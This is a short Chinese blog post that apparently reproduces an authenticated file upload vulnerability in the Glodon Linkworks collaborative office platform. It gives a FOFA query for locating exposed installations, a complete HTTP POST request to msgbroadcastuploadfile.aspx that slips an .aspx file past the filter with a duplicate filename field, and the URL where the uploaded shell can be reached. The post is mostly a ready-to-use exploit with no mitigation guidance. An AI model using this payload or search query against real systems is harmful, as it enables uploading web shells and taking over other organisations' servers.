Babing
Published on 2024-08-30 / 2 Visits
0
0

G3-8广联达-Linkworks协同办公管理平台-文件上传

G3-8广联达-Linkworks协同办公管理平台-文件上传

漏洞描述:

广联达Linkworks msgbroadcastuploadfile.aspx存在后台文件上传漏洞,攻击者可利用此漏洞在后台上传任意文件,进而接管服务

网站图片:

image-20240621131455960

网络测绘:

fofa语法:

​ body=“Services/Identification/login.ashx” || header=“Services/Identification/login.ashx” || banner=“Services/Identification/login.ashx”

漏洞复现:

payload:

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: {host}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: {cookie}

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text

shell
------WebKitFormBoundaryFfJZ4PlAZBixjELj--

效果图:

文件上传接口的返回内容中包含了回显文件名,完整的回显地址如下:
http://url/GTP/IM/Services/Group/Upload/回显文件名

访问页面


Comment